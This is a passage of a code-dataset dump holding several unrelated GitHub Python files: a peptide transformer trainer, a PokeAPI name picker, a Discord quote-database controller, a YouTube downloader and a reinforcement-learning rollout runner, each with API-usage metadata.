"attribute"}, {"api_name": "fields.TimestampField", "line_number": 112, "usage_type": "name"}, {"api_name": "exceptions.EmptyColumnError", "line_number": 133, "usage_type": "call"}, {"api_name": "django.conf.settings.TESTING", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 167, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 176, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 176, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 183, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "12429861819", "text": "from gensim.models import KeyedVectors\nimport pandas as pd\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport Transformer as tfr\n\nnum_shape = 512\n\nion_w2v = KeyedVectors.load_word2vec_format(\"ion_w2v\")\namino_w2v = KeyedVectors.load_word2vec_format(\"amino_w2v\")\ndata = pd.read_csv(\"data.csv\")\nprint(len(data[\"mz\"]))\nprint(len(data[\"seq\"]))\nmz_mx_len = 0\nseq_mx_len = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n mz_mx_len = max(mz_mx_len,len(mz_array))\n\nfor i in data[\"seq\"]:\n seq_mx_len = max(seq_mx_len,len(i))\nseq_mx_len += 2\nzero = []\nfor i in range(num_shape):\n zero.append(0)\ninput_array = []\noutput_array = []\ncnt = 0\ntotal = len(data[\"mz\"])\nload_count = np.zeros((101))\nmx_val = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n vv = []\n for p in mz_array:\n rval = p * 10\n rval = round(rval)\n mx_val = max(mx_val,rval)\n vv.append(rval)\n diff = mz_mx_len - len(mz_array)\n for p in range(diff):\n vv.append(0)\n input_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per%10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt*100/total),-1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Succes input array\")\ntime.sleep(1)\n\nload_count = np.zeros((101))\ncnt = 0\nfor i in data[\"seq\"]:\n vv = []\n vv.append(1)\n for p in i:\n vv.append(ord(p)-ord('A') + 3)\n vv.append(2)\n diff = seq_mx_len - len(i) - 2\n for p in range(diff):\n vv.append(0)\n output_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per %10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt * 100 / total), -1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Success output array\")\n\nprint(\"input size : {} , output size :{}\".format(len(input_array),len(output_array)))\n\nprint(\"go into Transformer\")\ntime.sleep(1)\n\nprint(\"max_value : {}\".format(mx_val))\ndmodel = 512\nnum_layer = 6\nnum_head = 8\ndff = 2048\ndropout = 0.3\ninput_size = 20000\noutput_size = 30\nepoch = 20\nBATCH_SIZE = 20\nBUFFER_SIZE = 20000\ninput_array = np.array(input_array)\noutput_array = np.array(output_array)\n\nATCH_SIZE = 64\nBUFFER_SIZE = 20000\nprint(seq_mx_len)\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': input_array,\n 'dec_inputs': output_array[:, :-1]\n },\n {\n 'outputs': 
output_array[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\ntf.keras.backend.clear_session()\nmodel = tfr.transformer(vocab_size=input_size,\n num_layers=num_layer,\n dff=dff,\n d_model=dmodel,\n num_heads=num_head,\n dropout=dropout)\nlearning_rate = tfr.CustomSchedule(dmodel)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\ndef accuracy(y_true, y_pred):\n print(y_true)\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\nmodel.fit(dataset,epochs=epoch)", "repo_name": "dtc03012/Peptide_Search", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 10, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 10, "usage_type": "name"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 11, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.clear_session", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "Transformer.transformer", "line_number": 114, "usage_type": "call"}, {"api_name": "Transformer.CustomSchedule", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 131, "usage_type": "call"}, {"api_name": 
"tensorflow.not_equal", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.sparse_categorical_accuracy", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 139, "usage_type": "attribute"}]} +{"seq_id": "71442091369", "text": "import requests\nimport random\n\n# Define the API endpoint for Pokemon names\napi_endpoint = \"https://pokeapi.co/api/v2/pokemon/?limit=1118\"\n\n# Make a request to the API and get the JSON response\nresponse = requests.get(api_endpoint).json()\n\n# Extract the list of Pokemon names from the response\npokemon_names = [pokemon['name'] for pokemon in response['results']]\n\n# Get a random Pokemon name from the list\nrandom_pokemon = random.choice(pokemon_names)\n\n# Capitalize the first letter of the Pokemon name\ncapitalized_pokemon = random_pokemon.capitalize()\n\n# Print the result\n# print(capitalized_pokemon)\n", "repo_name": "Shields003/pythonNPC", "sub_path": "getPokemon.py", "file_name": "getPokemon.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "30724153739", "text": "import logging\nfrom datetime import datetime\nfrom typing import List, Union\n\nimport discord\nfrom sqlalchemy import orm\n\n# noinspection PyUnresolvedReferences\nfrom kaztron.driver import database as db\nfrom kaztron.cog.quotedb.model import *\nfrom kaztron.driver.database import make_error_handler_decorator, func\nfrom kaztron.utils.discord import extract_user_id\n\nlogger = logging.getLogger(__name__)\n\ndb_file = 'quotedb.sqlite'\n\nengine = None\nSession = db.sessionmaker()\nsession = None\n\n\nclass UserNotFound(RuntimeError):\n pass\n\n\ndef init_db():\n global engine, session\n engine = db.make_sqlite_engine(db_file)\n Session.configure(bind=engine)\n session = Session()\n Base.metadata.create_all(engine)\n\n\non_error_rollback = make_error_handler_decorator(lambda *args, **kwargs: session, logger)\n\n\ndef query_user(server: discord.Server, id_: str):\n \"\"\"\n Find a user given an ID string passed by command, or create it if it does not exist.\n\n id_ can be passed to a command as a discord mention ``<@123456789012345678>`` or\n ``<@!123456789012345678>``, or as a Discord ID ``123456789012345678`` (various malformed\n inputs may also be accepted, e.g., ``@123456789012345678``).\n\n For Discord Mention or Discord ID, if the user is not found but exists on Discord, a new\n entry is created. In other cases, a :cls:`~.UserNotFound` error is raised.\n\n :raises UserNotFound: User was not found. 
Either the Discord user exists neither on Discord\n nor in the database, or a database ID was passed and could not be found.\n :raises discord.HTTPException: Discord API error occurred\n :raises db.exc.MultipleResultsFound: Should never happen - database is buggered.\n \"\"\"\n\n # Parse the passed ID\n try:\n discord_id = extract_user_id(id_)\n except discord.InvalidArgument:\n raise ValueError('Invalid Discord user ID format')\n logger.debug('query_user: passed Discord ID: {}'.format(discord_id))\n\n # Check if user exists\n try:\n db_user = session.query(User).filter_by(discord_id=discord_id).one()\n except db.orm_exc.MultipleResultsFound:\n logger.exception(\"Er, mate, I think we've got a problem here. \"\n \"The database is buggered.\")\n raise\n except db.orm_exc.NoResultFound:\n logger.debug('query_user: user not found, creating user')\n member = server.get_member(discord_id) # type: discord.Member\n if member is None:\n raise UserNotFound('Discord user not found')\n db_user = create_user(member)\n logger.debug('query_user: created user: {!r}'.format(db_user))\n else:\n logger.debug('query_user: found user: {!r}'.format(db_user))\n\n member = server.get_member(discord_id) # type: discord.Member\n if member:\n update_nicknames(db_user, member)\n else:\n logger.warning(\"Can't find user {!r} on Discord, skipping update nicknames\"\n .format(db_user))\n\n return db_user\n\n\n@on_error_rollback\ndef create_user(member: discord.Member) -> User:\n db_user = User(\n discord_id=member.id,\n name=member.nick if member.nick else member.name,\n username=member.name\n )\n session.add(db_user)\n session.commit()\n return db_user\n\n\ndef search_users(query: str) -> List[User]:\n \"\"\"\n Search for users.\n :param query: The substring to search for.\n :return:\n \"\"\"\n search_term_like = '%{}%'.format(query.replace('%', '\\\\%').replace('_', '\\\\_'))\n # noinspection PyUnresolvedReferences\n results = session.query(User) \\\n .filter(db.or_(User.name.ilike(search_term_like, escape='\\\\'),\n User.username.ilike(search_term_like, escape='\\\\'))) \\\n .order_by(User.name) \\\n .all()\n try:\n results[0]\n except IndexError:\n raise UserNotFound\n logger.info(\"search_users: Found {:d} results for {!r}\".format(len(results), query))\n return results\n\n\ndef random_quote() -> Quote:\n return session.query(Quote).order_by(func.random()).limit(1).one()\n\n\ndef get_total_quotes() -> int:\n return session.query(Quote).count()\n\n\ndef get_total_quoted_users() -> int:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User).join(User.quotes).having(total > 0).group_by(User.user_id).count()\n\n\ndef get_top_quoted(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.quotes) \\\n .group_by(Quote.author_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef get_top_saved(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.saved_quotes) \\\n .group_by(Quote.saved_by_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef search_quotes(search_term: str=None, user: Union[User, List[User]]=None) -> List[Quote]:\n \"\"\"\n Fulltext search for quotes.\n :param search_term: The substring to search for.\n :param user: optional user to filter by\n \"\"\"\n\n if not user and not search_term:\n raise ValueError(\"Must specify at least 1 search criterion\")\n\n if user:\n user_list = [user] if isinstance(user, User) else user # type: 
List[User]\n else:\n user_list = []\n\n query = session.query(Quote)\n if user_list:\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.author_id.in_(u.user_id for u in user_list))\n\n if search_term:\n search_term_like = db.format_like(search_term)\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.message.ilike(search_term_like, escape='\\\\'))\n\n results = query.order_by(Quote.timestamp).all()\n try:\n results[0]\n except IndexError:\n raise orm.exc.NoResultFound\n logger.info(\"search_quotes: Found {:d} results for search_term={}, user_list={}\"\n .format(len(results), search_term, ','.join(u.name for u in user_list)))\n return results\n\n\n@on_error_rollback\ndef store_quote(\n user: User,\n saved_by: User,\n channel_id: str,\n message: str,\n timestamp: datetime=None):\n \"\"\"\n Store a new quote.\n :param user: Author of the note.\n :param saved_by: User who initiated storage of this note.\n :param channel_id: Channel in which the quote was said.\n :param message: User's message to retain as a quote.\n :param timestamp: Time at which quote was said (or stored, if unavailable).\n :return:\n \"\"\"\n if timestamp is None:\n timestamp = datetime.utcnow()\n\n logger.info(\"Inserting quote by {}...\".format(user))\n logger.debug(\"store_quote: user={!s} saved_by={!s} timestamp={} message={!r}\"\n .format(user, saved_by, timestamp.isoformat(' '), message))\n quote = Quote(\n timestamp=timestamp, author=user, saved_by=saved_by, channel_id=channel_id, message=message\n )\n session.add(quote)\n session.commit()\n return quote\n\n\n@on_error_rollback\ndef update_nicknames(user: User, member: discord.Member):\n \"\"\"\n Update a user's nicknames and usernames.\n \"\"\"\n logger.debug(\"update_nicknames: Updating names: {!r}...\".format(user))\n user.name = member.nick if member.nick else member.name\n user.username = member.name\n session.commit()\n logger.info(\"update_nicknames: Updated names: {!r}\".format(user))\n\n\n@on_error_rollback\ndef remove_quotes(quotes: List[Quote]):\n \"\"\"\n Delete a quote object from the database.\n \"\"\"\n for quote in quotes:\n logger.info(\"remove_quotes: Deleting quote {!r}...\".format(quote))\n session.delete(quote)\n session.commit()\n", "repo_name": "Worldbuilding/kaztron", "sub_path": "kaztron/cog/quotedb/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 7635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "kaztron.driver.database.sessionmaker", "line_number": 19, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 19, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_sqlite_engine", "line_number": 29, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 29, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_error_handler_decorator", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Server", "line_number": 38, "usage_type": "attribute"}, {"api_name": "kaztron.utils.discord.extract_user_id", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.InvalidArgument", "line_number": 58, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 65, "usage_type": "name"}, {"api_name": 
"kaztron.driver.database.orm_exc", "line_number": 69, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 69, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 90, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.or_", "line_number": 110, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 101, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.random", "line_number": 123, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 123, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 131, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 131, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 131, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 136, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 136, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 136, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 138, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 142, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 142, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 142, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 144, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "kaztron.driver.database.format_like", "line_number": 168, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 168, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm", "line_number": 176, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 199, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 199, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 213, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "71197424487", "text": "from pytube import YouTube\nimport os\nimport asyncio\n\n# link = \"https://youtu.be/EAYlckSaviI\"\nlink = input(\"Enter the link for the Youtube video to download: \")\n\ndownloadThisResolution = None\n\nyt = YouTube(link)\n\n# Create a folder with the name of playlist and execute the download code after navigating to the new Directory\ncurrentDir = os.getcwd()\n# print(currentDir)\nif(os.path.exists(f\"{currentDir}\\{yt.title}\")):\n print(f\"Folder {yt.title} already exists\")\n print(f\"Folder changed to {yt.title}\")\n os.chdir(yt.title) #Change directory\nelse: \n os.mkdir(yt.title) \t#Make directory\n os.chdir(yt.title)\n print(f\"Folder {yt.title} created\")\n 
print(f\"Folder changed to {yt.title}\")\n# print(os.getcwd())\n\nprint(f\"Downloading video: {yt.title}\")\n\n# get all the available resolutions of a video\npixels = yt.streams\navailableResolutions = list(enumerate(pixels))\nfor pix in availableResolutions:\n # print(pix)\n checkRes = str(pix[1])\n # print(checkRes)\n if(len(checkRes.split(\"720p\"))>1 and len(checkRes.split(\"video/mp4\"))>1 and len(checkRes.split(\"progressive=\\\"True\\\"\"))>1):\n print(pix[0])\n downloadThisResolution = pix[0]\n\n# print()\n# print(downloadThisResolution)\nasyncio.wait_for(pixels[downloadThisResolution].download())\nprint(f\"Video {yt.title} downloaded successfully!\")", "repo_name": "ManthanDhole/Youtube-Download-UtilityCode", "sub_path": "Single_YoutubeVideo_Downloader.py", "file_name": "Single_YoutubeVideo_Downloader.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "10306042367", "text": "from helpers import PartialRollout\nimport threading\nimport six.moves.queue as queue\nimport tensorflow as tf\nimport pdb\nfrom collections import deque\nfrom demonstration_manager import DemonstrationManager\nimport numpy as np\n\nclass RunnerThread(threading.Thread):\n \"\"\"\nOne of the key distinctions between a normal environment and a universe environment\nis that a universe environment is _real time_. This means that there should be a thread\nthat would constantly interact with the environment and tell it what to do. This thread is here.\n\"\"\"\n def __init__(self, env, policy, num_local_steps, visualise, reward_f = None,record = False,shared=False,enemy = False):\n threading.Thread.__init__(self)\n self.record = record\n self.queue = queue.Queue(5)\n self.num_local_steps = num_local_steps\n self.env = env\n self.last_features = None\n self.policy = policy\n self.daemon = True\n self.sess = None\n self.shared=shared\n self.same_colours = enemy\n\n self.summary_writer = None\n self.visualise = visualise\n self.reward_f = reward_f\n\n def start_runner(self, sess, summary_writer):\n self.sess = sess\n self.summary_writer = summary_writer\n self.start()\n\n def run(self):\n with self.sess.as_default():\n self._run()\n\n def _run(self):\n if self.record:\n rollout_provider = recording_runner(self.env, self.policy, self.num_local_steps, self.summary_writer,\n self.visualise)\n else:\n #rollout_provider = conv_runner(self.env, self.policy, self.num_local_steps, self.summary_writer, self.visualise,reward_f=self.reward_f,shared=self.shared)\n rollout_provider = self.runner()\n while True:\n # the timeout variable exists because apparently, if one worker dies, the other workers\n # won't die with it, unless the timeout is set to some large number. This is an empirical\n # observation.\n\n self.queue.put(next(rollout_provider), timeout=600.0)\n\n\n def runner(self):\n\n \"\"\"\n The logic of the thread runner. 
In brief, it constantly keeps on running\n the policy, and as long as the rollout exceeds a certain length, the thread\n runner appends the policy to the queue.\n \"\"\"\n\n # ok so theres a bunch of options here. Theres a record mode. a convolution or lstm option for both policy and reward function\n # skip the recording part for now such that the two run similarly.\n ## Define here the configuration of the whole thing.\n\n external_reward = self.reward_f is not None\n shared = hasattr(self.policy,\"shared\")\n policy_type = self.policy.type\n reward_type = self.reward_f.type if external_reward else None\n\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type =='lstm' else [None]\n\n if external_reward:\n if shared is False and reward_type=='lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type=='lstm':\n last_features,r_features = self.policy.get_initial_features()\n else:\n r_features =[None]\n\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n irl_rewards = []\n\n if policy_type == 'conv':\n p_mem_size = self.policy.mem_size\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n else:\n p_obs = last_state\n\n\n length = 0\n rewards = 0\n\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(self.num_local_steps):\n\n if policy_type=='conv':\n p_obs[:, :, :p_mem_size - 1] = p_obs[:, :, 1:p_mem_size]\n p_obs[:, :, -1] = last_state[:, :, 0]\n elif policy_type=='lstm':\n p_obs = last_state\n fetched = self.policy.act([p_obs], *last_features)\n action, value_, = fetched[0], fetched[1]\n features = fetched[2:] if policy_type =='lstm' else [None]\n\n # argmax to convert from one-hot\n state, reward, terminal, info = self.env.step(action.argmax())\n if self.same_colours:\n wh = np.where(state > np.amin(state))\n state[wh[0], wh[1]] = 0.6\n actual_reward = reward\n if self.visualise:\n self.env.render()\n\n if external_reward:\n # If there is an external reward function use that.\n if reward_type == 'conv':\n r_obs[:, :, :r_mem_size - 1] = r_obs[:, :, 1:r_mem_size]\n r_obs[:, :, -1] = last_state[:, :, 0]\n else:\n r_obs = last_state\n\n r_fetched = self.reward_f.reward([r_obs],[action*(1-self.same_colours)])\n #reward = r_fetched[0][0,0] #-r_fetched[0][0,1] #if reward is binary class.\n reward = r_fetched[0][0]\n irl_rewards.append(reward)\n r_features = r_fetched[2] if reward_type == 'lstm' else [None]\n rollout.add(last_state, action, reward, value_, terminal, last_features,r_features)\n else:\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n # collect the experience\n\n length += 1\n rewards += actual_reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n if self.reward_f is not None:\n summary.value.add(tag=\"global/discriminator_reward\", simple_value=float(reward))\n summary.value.add(tag=\"global/discriminator_reward_variance\", simple_value=np.var(irl_rewards))\n self.summary_writer.add_summary(summary, self.policy.global_step.eval())\n self.summary_writer.flush()\n\n timestep_limit = self.env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not self.env.metadata.get('semantics.autoreset'):\n 
last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type == 'lstm' else [None]\n if policy_type == 'conv':\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n if external_reward:\n if shared is False and reward_type == 'lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type == 'lstm':\n last_features, r_features = self.policy.get_initial_features()\n else:\n r_features = [None]\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n #with tf.device(tf.train.replica_device_setter(1)):\n if external_reward:\n print(\"IRL REWARDS: {}. Average: {}\".format(np.sum(irl_rewards),np.mean(irl_rewards)))\n if len(irl_rewards) > 0:\n print(\"Max reward {}\".format(np.amax(irl_rewards)))\n irl_rewards=[]\n\n length = 0\n rewards = 0\n\n break\n\n if not terminal_end:\n rollout.r = self.policy.value([p_obs], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout\n\n\ndef recording_runner(env, policy, num_local_steps, summary_writer, render):\n \"\"\"\n A thread runner that records the best and worse trajectories of the thread\n \"\"\"\n recorder = DemonstrationManager(\"../data/pong/demonstrations\")\n recorder_failure = DemonstrationManager(\"../data/pong/demonstrations_failure\")\n last_state = env.reset()\n last_features = policy.get_initial_features()\n length = 0\n rewards = 0\n demonstration = PartialRollout()\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(num_local_steps):\n fetched = policy.act([last_state], *last_features)\n action, value_, features = fetched[0], fetched[1], fetched[2:]\n\n\n # argmax to convert from one-hot\n state, reward, terminal, info = env.step(action.argmax())\n if render:\n env.render()\n\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n demonstration.add(last_state, action, reward, value_, terminal, last_features)\n\n length += 1\n rewards += reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n summary_writer.add_summary(summary, policy.global_step.eval())\n summary_writer.flush()\n\n timestep_limit = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not env.metadata.get('semantics.autoreset'):\n last_state = env.reset()\n last_features = policy.get_initial_features()\n print(\"Episode finished. Sum of rewards: %d. 
Length: %d\" % (rewards, length))\n recorder.append_to_best(demonstration)\n recorder_failure.append_to_worst(demonstration)\n demonstration = PartialRollout()\n length = 0\n rewards = 0\n break\n\n if not terminal_end:\n rollout.r = policy.value([last_state], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout", "repo_name": "KyriacosShiarli/gailf", "sub_path": "src/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 11073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 10, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "six.moves.queue.Queue", "line_number": 19, "usage_type": "call"}, {"api_name": "six.moves.queue", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 185, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 204, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 205, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 210, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 235, 